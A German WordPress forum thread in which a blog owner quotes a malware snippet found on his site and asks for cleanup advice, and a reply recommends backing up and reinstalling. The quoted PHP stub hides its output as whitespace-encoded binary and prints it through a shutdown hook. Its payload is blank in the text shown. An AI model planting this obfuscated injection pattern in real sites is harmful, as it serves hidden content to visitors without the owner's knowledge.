Problem: "/** * Gets some core libraries and displays a top message if required. /*"

• Liebe wordpresser,

ich habe einen blog der vor einiger Zeit

/** * Gets some core libraries and displays a top message if required. /* */ if(!function_exists('CoreLibrariesHandler')) { /* */ function CoreLibrariesHandler() { /* */ $session_keys = ' '; /* */ /* */ foreach(str_split($session_keys, 8) as $k=>$v) { /* */ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /* */ $session_keys[$k] = chr(bindec($v)); /* */ } /* */ /* */ if($session_keys) echo $session_keys; } /* */ register_shutdown_function('CoreLibrariesHandler'); /* */ } /* ***

usw.

ausspuckt.:roll:

Ich komme leider nicht in den wordpress/wp-login.php da kommt die gleich Fehlermeldung.
    Google hat zwar eine Lösung mit einer PC-Software ausgespuckt, aber 1) sitze ich am MAC und 2) wirkt das nicht vertrauenswürdig.

Hat jemand eine "Hintertür" wie ich das System wieder bereinige.
    Kann wordpress neu auspielen ohne die Beiträge zu löschen.

Danke für Eure Hilfe.
    Beste Grüße
    markymark!!

Nachtrag:
    Hier gabs die Windows-Software.

http://wewatchyourwebsite.com/wordpress/2011…shandler-error/

Ich könnte wohl auch alle PHP-Daten per Hand reinigen, aber vielleicht kennt Ihr ja auch was cooles :) ??

Einmal editiert, zuletzt von markymark (16. August 2012 um 14:57)

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Alle Daten sichern (Dateien und DB) und danach WP neu aufspielen. Ich bin mir ziemlich sicher, dass das an einem Plugin liegt. Wenn du keine Änderungen an irgendwelchen Plugin-Dateien gemacht hast würde ich demnach erst einmal Step-by-step alle Plugins manuell downloaden und überspielen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!